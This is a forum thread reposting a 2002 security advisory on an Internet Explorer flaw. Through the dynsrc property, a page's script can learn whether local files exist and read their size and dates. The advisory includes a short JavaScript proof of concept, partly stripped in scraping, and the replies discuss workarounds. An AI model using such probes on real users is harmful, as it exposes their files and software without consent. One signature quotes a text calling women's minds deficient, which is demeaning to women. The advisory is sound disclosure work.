Vulnerability: MS IE Local Files Information Retrieval
Results 1 to 4 of 4

Thread: Vulnerability: MS IE Local Files Information Retrieval

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation Vulnerability: MS IE Local Files Information Retrieval

    Retrieving information on local files in IE
    Posted by: Dalibor Glavan


    The problem lies within the dynsrc property's implementation, which
    completely ignores the source validity and gives script access to the
    assigned file even if it is not presentable.


    Affected applications:
    ======================

    All tested versions of Microsoft Internet Explorer (IE5+); prior versions
    may be vulnerable as well.


    Introduction:
    =============

    The element is commonly used to present images on an HTML document.
    However, it also contains a feature that allows it to present other types of
    media, such as VRML, AVI, MPEG, etc.

    This feature was implemented in the form of a property named dynsrc.


    Discussion:
    ===========

    The problem lies within the dynsrc property's implementation, which
    completely ignores the source validity and gives script access to the
    assigned file even if it is not presentable.

    Once a file name has been assigned to the dynsrc property it is possible to
    see whether it exists by checking the fileSize property of the
    element, if the return value is -1 then it is certain that the file does not
    exist, any greater value indicates that the file exists.

    When a file has been known to exist it is possible to extract additional
    information from the element.

    Such as:

    * The file size in bytes, using the fileSize property.
    * The date the file was created, using the fileCreatedDate property.
    * The date the file was last modified, using the fileModifiedDate property.
    * The date the file was last updated, using the fileUpdatedDate property.

    A malicious attacker may use this bug in conjunction with other bugs to
    detect files or determine whether the user has specific programs (and even
    specific versions, according to size) installed, etc.


    Exploit:
    ========

    This simple example demonstrates how the bug is used to check whether
    "c:/test.txt" exists and retrieves its additional properties if it does.



    setTimeout(
    function () {
    alert(
    oFile.fileSize>-1 ?
    "File exists!nn"+
    "Size: "+oFile.fileSize+" bytes.n"+
    "Created: "+oFile.fileCreatedDate+".n"+
    "Modified: "+oFile.fileModifiedDate+".n"+
    "Updated: "+oFile.fileUpdatedDate+"."
    :
    "File does not exist."
    );
    },
    250
    );



    Solution:
    =========

    Microsoft was first informed on 18 Feb 2002 (38 days ago), they have opened
    an investigation regarding this issue and will probably release a patch in
    the near future.

    Until a patch becomes available the only workaround is to disable Active
    Scripting.


    Tested on:
    ==========

    IE5sp2 NT4 sp6a, all possible patches.
    IE5.5sp2 Win98, all patches.
    IE5.5sp2 NT4 sp6a, all patches.
    IE6sp1 Win2000 sp2, all patches.


    Demonstration:
    ==============

    A fully dynamic proof-of-concept demonstration of this issue is available at
    http://security.greymagic.com/adv/gm003-ie/.


    Feedback:
    =========

    Please mail any questions or comments to security@greymagic.com.

    - Copyright © 2002 GreyMagic Software.


    Source: http://www.xatrix.org/modules.php?op...thread&order=1

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    every security minded person should already have active scripting disabled. its just to bad that it comes enabled by default
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  3. #3
    Senior Member
    Join Date
    Feb 2002
    Posts
    177
    So this is not fixed in MS's brand new IE patch? I just checked MS's site, and the IE patch said nothing about fixing a problem with what you're talking about Sonic. Maybe I missed something though.

  4. #4
    Senior Member
    Join Date
    Aug 2001
    Posts
    100
    this is microsofts way of handling things:
    "don't say anything about security holes in your system until you can't any longer deny it"

    that's not the "best" way of working with your clients but it's micosofts way and if you would have some million $ you would do it the same way ...

    ------------------------------------------------------------------------------------------------------------------------
    "Knowledge is the real power"
    \"Knowledge is the Real Power\"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •